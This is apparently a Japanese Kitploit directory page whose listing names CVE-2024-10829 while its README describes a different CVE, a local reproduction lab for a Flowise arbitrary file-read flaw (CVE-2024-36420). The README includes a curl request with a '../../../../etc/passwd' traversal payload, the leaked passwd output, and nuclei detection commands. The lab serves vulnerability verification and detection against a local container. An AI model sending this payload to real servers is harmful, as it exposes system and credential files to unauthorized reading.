Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
POC_CVE-2024-10829 — CVE-2024-10829 分析 | Kitploit
ツール/GitHubGitHub/junn34/poc_cve-2024-10829
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubjunn34/poc_cve-2024-10829

POC_CVE-2024-10829

CVE-2024-10829 分析

リポジトリを見る
2ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

POC_CVE-2024-36420

Flowise に影響を与える CVE-2024-36420 のローカル再現ラボと nuclei テンプレート草案。

概要

CVE-2024-36420 は、Flowise において fileName ボディパラメータがサニタイズされずに使用されることにより発生する任意ファイル読み取り脆弱性です。影響を受けるエンドポイント:

  • POST /api/v1/openai-assistants-file

このラボは以下を検証するために使用されました:

  • flowiseai/flowise:1.4.3 での脆弱な動作
  • 新しい flowiseai/flowise:3.1.2 での拒否された動作

参考文献

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  • GitHub Security Lab: https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/

ファイル

  • docker-compose.yml
  • docker-compose.latest.yml
  • CVE-2024-36420.yaml

脆弱性テスト

Flowise 1.4.3 を起動:

root@kitploit:~
docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise

手動確認:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

観測された脆弱なレスポンス:

root@kitploit:~
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...

新しいバージョンでの確認

新しい Flowise 3.1.2 を起動:

root@kitploit:~
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise

手動確認:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

観測された新しいバージョンのレスポンス:

root@kitploit:~
HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}

Nuclei

テンプレートを検証:

root@kitploit:~
nuclei -duc -validate -t CVE-2024-36420.yaml

脆弱なターゲットに対して実行:

root@kitploit:~
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml

期待される動作:

  • 1.4.3: マッチ
  • 3.1.2: マッチしない

注意事項

  • バージョン間のギャップは容認されています。このリポジトリは観測された動作のみを主張します:
    • 1.4.3 で脆弱
    • 3.1.2 で拒否
  • 正確なパッチ適用バージョンの境界を主張するものではありません。
  • 実際のターゲットは使用されていません。
ツールをダウンロード